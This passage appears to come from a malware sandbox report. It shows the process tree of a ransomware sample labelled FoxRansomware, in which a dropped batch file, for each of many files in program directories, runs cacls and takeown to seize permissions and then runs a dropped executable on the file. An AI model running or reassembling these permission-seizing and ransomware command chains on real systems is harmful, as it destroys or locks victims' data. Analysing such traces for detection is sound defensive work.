    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    - Modifies file permissions
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  - Loads dropped DLL
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "eula.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "eula.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  - Loads dropped DLL
  PID:1712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      Executes dropped EXE
      PID:800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  - Loads dropped DLL
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1304
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  - Loads dropped DLL
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    - Modifies file permissions
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "create_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "create_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1368
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "info.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:1632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    - Modifies file permissions
    PID:1296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:536
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    - Modifies file permissions
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:536
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1000
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:520
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:760
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:1312
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    - Modifies file permissions
    PID:980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:800
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    - Modifies file permissions
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1708
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
